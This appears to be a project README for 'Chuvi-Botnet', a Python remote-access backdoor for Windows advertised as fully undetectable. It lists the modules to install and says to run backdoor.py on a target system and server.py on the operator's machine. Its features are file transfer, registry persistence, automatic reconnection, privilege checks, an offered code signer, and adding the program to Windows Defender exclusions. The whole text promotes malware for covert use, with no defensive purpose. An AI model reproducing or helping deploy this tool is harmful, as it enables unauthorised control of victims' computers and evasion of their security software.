Chuvi-Botnet
Chuvi-Botnet copied to clipboard
Fud Persistent Windows Backdoor developed purely in python
Installtion for windows
Steps to be followed :
1. Download python from this site.
2. Installing Required Modules :
1. pip install pynput==1.6.8
2. pip install pyinstaller==3.6
Usage
1. change ip and port in backdoor.py and server.py
2. Run: python backdoor.py on target system
3. Run. python server.py in your local machine
Features :
1.Upload and download file
2.persistent feature (Create Persistence In Registry)
3.backdoor tries to connect every 30 seconds
4.Check User Privileges
5.I will provide an exe signer to sign your backdoor 'exe' file
6.Add exe file to execlusion in defender settings
7.Ask For Admin Permission.If ignored the script will quit
Compile to exe :
run compiler.bat